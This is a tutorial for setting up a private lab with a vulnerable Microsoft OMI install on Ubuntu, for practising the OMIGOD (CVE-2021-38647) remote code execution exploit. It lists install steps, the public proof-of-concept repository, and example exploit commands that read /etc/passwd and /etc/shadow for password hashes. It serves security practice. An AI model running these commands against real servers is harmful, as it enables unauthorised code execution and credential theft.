Creating your own private pwn lab for OMI Exploitation
First off huge thanks to IPPSEC for posting this video and doing the heavy work when I started looking into making a private OMI Exploitation lab without hosting it on azure.
At first I ran into SSL issues with the OMI install followed by namespace issues with the SOAP requests with the exploit POC I was using. So to make things very simple I documented out everything you need to make your own private OMI pwn lab.
Step 1: Download Ubuntu Server 20.04.3
Step 2: Download the following package links with wget directly to the server
wget https://github.com/microsoft/omi/releases/download/v1.6.8-0/omi-1.6.8-0.ssl_110.ulinux.x64.deb
wget https://github.com/microsoft/SCXcore/releases/download/v1.6.8-1/scx-1.6.8-1.ssl_110.ulinux.x64.deb
Step 3: Install vulnerable OMI release onto ubuntu server
sudo dpkg -i omi-1.6.8–0.ssl_110.ulinux.x64.deb
Step 4: Modify omiserver.conf on ubuntu server to listen on port 5986 for https
cd /etc/opt/omi/conf
sudo nano omiserver.conf
Once you update the saved file restart the omi services by issuing the following command:
sudo service omid restart
Step 5: Install the SCX Core package on the ubuntu server. This will fix the runspace issues encountered running the OMIGOD exploit POC
sudo dpkg -i scx-1.6.8–1.ssl_110.ulinux.x64.deb
Step 6: Download OMIGOD exploit POC (on Your hacking box such as Kali)
git clone https://github.com/horizon3ai/CVE-2021-38647
Once the package is cloned you should be able to run the following example command to see what ID the exploit runs as when you target the vulnerable ubuntu server (replace IP with your ubuntu server vulnerable IP):
python3 omigod.py -t 10.0.0.5 -c id
Example:
At this point you can play around with other commands for reconnaissance or exploitation such as:
Gathering users:
python3 omigod.py -t 10.0.0.5 -c ‘cat /etc/passwd’
Getting password hashes:
python3 omigod.py -t 10.0.0.5 -c ‘cat /etc/shadow’
There are really lots of possibilities here to play around with.
